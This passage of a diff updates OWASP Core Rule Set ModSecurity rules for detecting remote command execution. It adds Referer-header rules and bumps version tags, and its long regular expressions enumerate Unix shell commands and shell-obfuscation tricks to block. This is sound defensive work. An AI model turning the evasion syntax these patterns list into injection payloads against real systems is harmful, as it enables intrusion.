*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|[fs]|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \
+SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \
+    "id:932205,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:lowercase,t:urlDecodeUni,\
+    msg:'RCE Bypass Technique',\
+    logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-multi',\
+    tag:'platform-multi',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
+    chain"
+    SecRule TX:1 "@rx /" \
+        "t:none,t:urlDecodeUni,\
+        chain"
+        SecRule TX:1 "@rx \s" \
+            "t:none,t:urlDecodeUni,\
+            setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+            setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{])" \
+    "id:932206,\
+    phase:2,\
+    block,\
+    capture,\
+    t:none,t:lowercase,t:urlDecodeUni,\
+    msg:'RCE Bypass Technique',\
+    logdata:'Matched Data: %{TX.0} found within %{TX.932206_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+    tag:'application-multi',\
+    tag:'language-multi',\
+    tag:'platform-multi',\
+    tag:'attack-rce',\
+    tag:'paranoia-level/2',\
+    tag:'OWASP_CRS',\
+    tag:'capec/1000/152/248/88',\
+    tag:'PCI/6.5.2',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
+    severity:'CRITICAL',\
+    setvar:'tx.932206_matched_var_name=%{matched_var_name}',\
+    chain"
+    SecRule MATCHED_VAR "@rx /" \
+        "t:none,t:urlDecodeUni,\
+        chain"
+        SecRule MATCHED_VAR "@rx \s" \
+            "t:none,t:urlDecodeUni,\
+            setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+            setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?E[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?T|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[gr])|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[c-dgi]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)?|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|[co][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|l)|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \
     "id:932220,\
     phase:2,\
     block,\
@@ -419,7 +473,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -439,7 +493,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
     SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \
@@ -461,7 +515,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -479,7 +533,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -497,7 +551,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -515,11 +569,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/137/134',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)(?:(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*|(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*)[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[ar]?|a(?:(?:b|w[ks])[\s\v&\)<>\|]|pt(?:-get)?|r(?:[\s\v&\)<>jp\|]|ch[\s\v<>]|ia2c)|s(?:[\s\v&\)<>h\|]|cii(?:-xfr|85)|pell)|t(?:[\s\v&\)<>\|]|obm)|dduser|getty|l(?:ias|pine)[\s\v<>]|nsible-playbook)|b(?:z(?:z[\s\v&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2|less|more)|a(?:s(?:e(?:32|64|nc)|h)|tch[\s\v<>])|pftrace|r(?:eaksw|idge[\s\v<>])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v<>]|zip2)|s(?:ctl|ybox))|yebug)|c(?:[8-9]9|a(?:t[\s\v&\)<>\|]|(?:ncel|psh)[\s\v<>])|c[\s\v&\)<>\|]|mp|p(?:[\s\v&\)<>\|]|an|io|ulimit)|s(?:h|plit|vtool)|u(?:t[\s\v&\)<>\|]|psfilter|rl)|ertbot|h(?:attr|dir[\s\v<>]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|flags|mod|o(?:om|wn)|root)|o(?:(?:b|pro)c|lumn[\s\v<>]|m(?:m(?:and[\s\v<>])?|p(?:oser|ress[\s\v<>]))|w(?:say|think))|r(?:ash[\s\v<>]|ontab))|d(?:[du][\s\v&\)<>\|]|i(?:g|(?:alog|ff)[\s\v<>])|nf|a(?:sh|te)[\s\v<>]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v<>]|sbox)|pkg|vips)|e(?:[bd][\s\v&\)<>\|]|n(?:v(?:[\s\v&\)<>\|]|-update)|d(?:if|sw))|qn|x(?:[\s\v&\)<>\|]|ec[\s\v<>]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v<>]|r))|(?:asy_instal|va)l|cho[\s\v<>]|fax|grep|macs|sac)|f(?:c[\s\v&\)<>\|]|i(?:[\s\v&\)<>\|]|le(?:[\s\v<>]|test)|(?:n(?:d|ger)|sh)[\s\v<>])|mt|tp(?:[\s\v&\)<>\|]|stats|who)|acter|(?:etch|lock)[\s\v<>]|grep|o(?:ld[\s\v<>]|reach)|ping|unction)|g(?:c(?:c[^\s\v]|ore)|db|e(?:m[\s\v&\)<>\|]|ni(?:e[\s\v<>]|soimage)|tfacl[\s\v